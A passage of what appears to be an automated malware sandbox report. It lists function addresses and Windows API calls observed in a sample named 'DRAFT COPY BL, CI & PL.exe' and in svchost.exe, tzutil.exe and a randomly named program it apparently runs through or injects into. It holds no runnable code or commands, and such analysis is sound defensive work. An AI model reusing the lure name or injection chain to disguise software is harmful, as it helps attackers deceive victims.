                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2FA0 NtQuerySection,6_2_039A2FA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2F60 NtCreateProcessEx,6_2_039A2F60
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2EA0 NtAdjustPrivilegesToken,6_2_039A2EA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2E30 NtWriteVirtualMemory,6_2_039A2E30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2DB0 NtEnumerateKey,6_2_039A2DB0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2D00 NtSetInformationFile,6_2_039A2D00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2CC0 NtQueryVirtualMemory,6_2_039A2CC0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2CF0 NtOpenProcess,6_2_039A2CF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A2C00 NtQueryInformationProcess,6_2_039A2C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A3090 NtSetValueKey,6_2_039A3090
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A3010 NtOpenDirectoryObject,6_2_039A3010
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A3D10 NtOpenProcessToken,6_2_039A3D10
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A3D70 NtOpenThread,6_2_039A3D70
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F99680 NtDeleteFile,6_2_02F99680
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F99720 NtClose,6_2_02F99720
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F99420 NtCreateFile,6_2_02F99420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F99590 NtReadFile,6_2_02F99590
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_02F99890 NtAllocateVirtualMemory,6_2_02F99890
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0099A1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_0099A1EF
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00988310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00988310
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009951BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_009951BD
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0093E6A00_2_0093E6A0
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095D9750_2_0095D975
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0093FCE00_2_0093FCE0
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009521C50_2_009521C5
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009662D20_2_009662D2
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009B03DA0_2_009B03DA
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0096242E0_2_0096242E
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009525FA0_2_009525FA
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009466E10_2_009466E1
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0098E6160_2_0098E616
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0096878F0_2_0096878F
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009988890_2_00998889
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009488080_2_00948808
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009B08570_2_009B0857
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009668440_2_00966844
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095CB210_2_0095CB21
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00966DB60_2_00966DB6
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00946F9E0_2_00946F9E
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009430300_2_00943030
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009531870_2_00953187
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095F1D90_2_0095F1D9
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009312870_2_00931287
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009514840_2_00951484
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009455200_2_00945520
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009576960_2_00957696
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009457600_2_00945760
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009519780_2_00951978
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00969AB50_2_00969AB5
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00951D900_2_00951D90
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0095BDA60_2_0095BDA6
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_009B7DDB0_2_009B7DDB
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_00943FE00_2_00943FE0
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_0093DF000_2_0093DF00
                Source: C:\Users\user\Desktop\DRAFT COPY BL, CI & PL.exeCode function: 0_2_010D9C080_2_010D9C08
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004189031_2_00418903
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004030501_2_00403050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042F0831_2_0042F083
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004101631_2_00410163
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402B661_2_00402B66
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00402B701_2_00402B70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B0E1_2_00416B0E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416B131_2_00416B13
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004103831_2_00410383
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E3831_2_0040E383
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4D11_2_0040E4D1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040E4D31_2_0040E4D3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040274A1_2_0040274A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004027501_2_00402750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4E3F01_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D003E61_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFA3521_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC02C01_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE02741_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF81CC1_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF41A21_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D001AA1_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CC81581_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C301001_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDA1181_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD20001_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3C7C01_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C647501_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C407701_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5C6E01_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D005911_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C405351_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEE4F61_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF24461_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE44201_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF6BD71_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFAB401_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3EA801_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C429A01_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0A9A61_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C569621_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C6E8F01_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C268B81_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4A8401_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C428401_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C32FC81_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CBEFA01_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB4F401_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C82F281_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C60F301_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE2F301_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEEDB1_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C52E901_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFCE931_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40E591_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFEE261_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C3ADE01_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C58DBF1_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4AD001_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDCD1F1_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C30CF21_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE0CB51_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C40C001_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C8739A1_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2D34C1_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF132D1_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B2C01_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE12ED1_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5D2F01_2_03C5D2F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C452A01_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C4B1B01_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7516C1_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C2F1721_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D0B16B1_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEF0CC1_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C470C01_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF70E91_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF0E01_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF7B01_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF16CC1_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C856301_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03D095C31_2_03D095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDD5B01_2_03CDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF75711_2_03CF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C314601_2_03C31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFF43F1_2_03CFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB5BF01_2_03CB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C7DBF91_2_03C7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FB801_2_03C5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFB761_2_03CFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CEDAC61_2_03CEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CDDAAC1_2_03CDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C85AA01_2_03C85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CE1AA31_2_03CE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFA491_2_03CFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7A461_2_03CF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB3A6C1_2_03CB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C499501_2_03C49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5B9501_2_03C5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CD59101_2_03CD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C438E01_2_03C438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CAD8001_2_03CAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD21_2_03C03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C03FD51_2_03C03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C41F921_2_03C41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFFB11_2_03CFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFF091_2_03CFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C49EB01_2_03C49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C5FDC01_2_03C5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03C43D401_2_03C43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF1D5A1_2_03CF1D5A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CF7D731_2_03CF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CFFCF21_2_03CFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03CB9C321_2_03CB9C32
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_013369A95_2_013369A9
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_0133A0495_2_0133A049
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_013318A95_2_013318A9
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_013382545_2_01338254
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_013382595_2_01338259
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_01331AC95_2_01331AC9
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_0132FAC95_2_0132FAC9
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_0132FC175_2_0132FC17
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_0132FC195_2_0132FC19
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_013507C95_2_013507C9
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043A24985_2_043A2498
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043AAC815_2_043AAC81
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043AAC865_2_043AAC86
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043A24F65_2_043A24F6
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043A44F65_2_043A44F6
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043A26465_2_043A2646
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043A26445_2_043A2644
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043C31F65_2_043C31F6
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043ACA765_2_043ACA76
                Source: C:\Program Files (x86)\BeHZpnDPNybFdUBFlhMsZivWZNAnjuKahagnAqinfMgldqWRDXiP\oFlOzErifOVgUf.exeCode function: 5_2_043A42D65_2_043A42D6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A303E66_2_03A303E6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0397E3F06_2_0397E3F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2A3526_2_03A2A352
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039F02C06_2_039F02C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A102746_2_03A10274
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A241A26_2_03A241A2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A301AA6_2_03A301AA
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A281CC6_2_03A281CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039601006_2_03960100
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A0A1186_2_03A0A118
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039F81586_2_039F8158
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A020006_2_03A02000
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0396C7C06_2_0396C7C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039947506_2_03994750
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039707706_2_03970770
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398C6E06_2_0398C6E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A305916_2_03A30591
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039705356_2_03970535
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A1E4F66_2_03A1E4F6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A144206_2_03A14420
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A224466_2_03A22446
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A26BD76_2_03A26BD7
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2AB406_2_03A2AB40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0396EA806_2_0396EA80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A3A9A66_2_03A3A9A6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039729A06_2_039729A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039869626_2_03986962
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039568B86_2_039568B8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0399E8F06_2_0399E8F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039728406_2_03972840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0397A8406_2_0397A840
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039EEFA06_2_039EEFA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03962FC86_2_03962FC8
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A12F306_2_03A12F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03990F306_2_03990F30
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039B2F286_2_039B2F28
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039E4F406_2_039E4F40
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03982E906_2_03982E90
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2CE936_2_03A2CE93
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2EEDB6_2_03A2EEDB
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2EE266_2_03A2EE26
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03970E596_2_03970E59
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03988DBF6_2_03988DBF
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0397AD006_2_0397AD00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A0CD1F6_2_03A0CD1F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A10CB56_2_03A10CB5
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03960CF26_2_03960CF2
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03970C006_2_03970C00
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039B739A6_2_039B739A
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2132D6_2_03A2132D
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0395D34C6_2_0395D34C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039752A06_2_039752A0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A112ED6_2_03A112ED
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398B2C06_2_0398B2C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398D2F06_2_0398D2F0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0397B1B06_2_0397B1B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A3B16B6_2_03A3B16B
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0395F1726_2_0395F172
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039A516C6_2_039A516C
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2F0E06_2_03A2F0E0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A270E96_2_03A270E9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039770C06_2_039770C0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A1F0CC6_2_03A1F0CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2F7B06_2_03A2F7B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A216CC6_2_03A216CC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039B56306_2_039B5630
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A0D5B06_2_03A0D5B0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A395C36_2_03A395C3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A275716_2_03A27571
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2F43F6_2_03A2F43F
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039614606_2_03961460
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_0398FB806_2_0398FB80
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039ADBF96_2_039ADBF9
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039E5BF06_2_039E5BF0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FB766_2_03A2FB76
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A11AA36_2_03A11AA3
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A0DAAC6_2_03A0DAAC
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039B5AA06_2_039B5AA0
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A1DAC66_2_03A1DAC6
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A27A466_2_03A27A46
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_03A2FA496_2_03A2FA49
                Source: C:\Windows\SysWOW64\tzutil.exeCode function: 6_2_039E3A6C6_2_039E3A6C
